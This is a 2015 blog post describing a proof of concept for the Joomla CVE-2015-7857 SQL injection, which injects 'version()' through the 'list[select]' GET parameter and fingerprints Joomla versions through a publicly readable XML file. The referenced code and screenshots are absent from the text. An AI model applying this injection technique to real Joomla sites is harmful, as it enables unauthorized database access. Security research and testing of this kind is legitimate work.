Sunday, 27 December 2015

Joomla CVE-2015-7857 writeup

(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)

Few weeks ago Asaf Orpani found SQL injection vulnerability in 'latest' (in those days) Joomla CMS.
After CVE: vulnerable is version line from 3.2 to 3.4.

Because I was involved in other projects,  I found information about this CVE just few days ago... When I saw that Asaf published more details about possible exploitaton (then CVE), I was wondering
if I will be able to write small proof-of-concept code to use it later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.”

Cool. ;]

I think that "all technical details"  you will find described at the SpiderLabs Blog so there is no point to copy/paste it here again.

What we will actually need is just one screen from Trustwave's Blog: one with GET request.
We can observe that 'for exploitation' we can create just a simple 'one liner' GET. We will use
python for this. ;)

Let's write a small web-client (GET request, based on urllib2 library).
Our goal is: type IP/hostname and click enter to get DB version. ;)

This case will be a little different than one described on SpiderLab's Blog, because we don't want to wait for admin to log-in. We don't need logged-in admin on webapp/server during our pentest. ;P

Our proof-of-concept payload, will use simple "version()"injected into SQL query,
when user will visit link with 'list[select]' parameter. On my localhost server we
will use LAMP (on Debian8) and Joomla 3.4.4.

By the way, it will be good to know if Joomla (found in our 'testing scope') is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and findout where we can find (if any) information
about the version:

$ grep  --color –nr –e 3.4.4 ./ 

Below you will find sample screen presenting strings containing 'version':

Now, we see a nice XML file containing version of Joomla installed on my box.
(It's good to mention here, that this file can be grabbed by anyone. You don't need
any credentials.)

So let's add few lines to our 'one liner' python script, to check if tested Joomla
is vulnerable or not. Sample code would look like this:
As you can see sqli(host) function is now commented out in the code. We only
want to see the version number. (Checking if you're Joomla installation got this file 
is left as an exercise for the reader.)

Joomla 3... SQL Injection
I tried this poc against 3.2, 3.3 and 3.4.4 installed on my box and to be honest, 
I was able to use it only against 3.4. (If you want - let me know in comments 
against which version installed on your box this poc worked. Thanks!;))

Modified version of this code is below:

Below is the screen of testing vulnerable Joomla 3.4.4 installed on my localhost.
Simple poc to get the version of MySQL available on the server:

No comments:

Post a Comment

What do You think...?